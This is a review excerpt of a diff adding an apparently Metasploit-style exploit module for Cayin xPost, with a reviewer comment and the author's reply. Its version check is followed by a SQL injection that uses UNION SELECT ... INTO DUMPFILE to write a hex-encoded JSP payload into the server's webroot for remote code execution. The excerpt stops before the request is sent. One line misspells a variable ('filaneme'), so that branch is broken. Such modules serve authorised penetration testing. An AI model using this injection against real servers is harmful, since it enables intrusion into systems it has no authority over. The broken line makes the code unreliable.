modules/exploits/windows/http/cayin_xpost_sql_rce.rb

```diff
@@ -0,0 +1,153 @@
+          },
+        'Payload' => # meterpreter is too large for payload space
+          {
+            'Space' => 2000,
+            'DisableNops' => true
+          },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [true, 'The URI of Cayin xPost', '/']),
+        OptString.new('LOCALWEBROOT', [true, 'Local install path webroot', 'C:/CayinApps/webapps/' ]), # default location
+        OptString.new('PAYLOADNAME', [false, 'Name of payload file to write', ''])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'cayin', 'js', 'English', 'language.js'),
+      'method' => 'GET'
+    )
+
+    if res.nil? || res.code != 200
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service, check URI Path and IP")
+      return CheckCode::Safe
+    end
+
+    %r{// xPost v(?<version>[\d\.]+) } =~ res.body
+
+    if version && Gem::Version.new(version) <= Gem::Version.new('2.5')
+      print_good("Version Detected: #{version}")
+      return CheckCode::Appears
+    end
+
+    # try a backup plan, at least verify the title
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'cayin', 'index.jsp'),
+      'method' => 'GET'
+    )
+
+    if res.nil? || res.code != 200
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service, check URI Path and IP")
+      return CheckCode::Safe
+    end
+
+    if res.body =~ %r{<title>xPost</title>}
+      vprint_good('HTML Title includes xPost')
+      return CheckCode::Detected
+    end
+    CheckCode::Safe
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    CheckCode::Safe
+  end
+
+  def exploit
+    filename = datastore['PAYLOADNAME'].blank? ? "#{rand_text_alphanumeric(6..12)}.jsp" : datastore['PAYLOADNAME']
+    filename = "#{filaneme}.jsp" unless filename.end_with? '.jsp'
+
+    vprint_status("Utilizing payload filename #{filename}")
+    vprint_status("Payload Size: #{payload.encoded.length}")
+    vprint_status("Payload Size Encoded: #{payload.encoded.unpack1('H*').length}")
+
+    payload_request = "-251' UNION ALL SELECT 0x"
+    payload_request << payload.encoded.unpack1('H*')
+    payload_request << ',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL '
+    payload_request << "INTO DUMPFILE '#{datastore['LOCALWEBROOT']}#{filename}'-- -"
+    payload_request.gsub!(' ', '%20')
+
+    vprint_status('Attempting Exploitation')
+    uri = normalize_uri(target_uri.path, 'cayin', 'wayfinder', 'wayfinder_meeting_input.jsp')
+    # use raw to prevent encoding of injection characters
```

Comment:
Unusual. Can you use POST instead?

Reply:
eh, it works, so i'm just going to leave it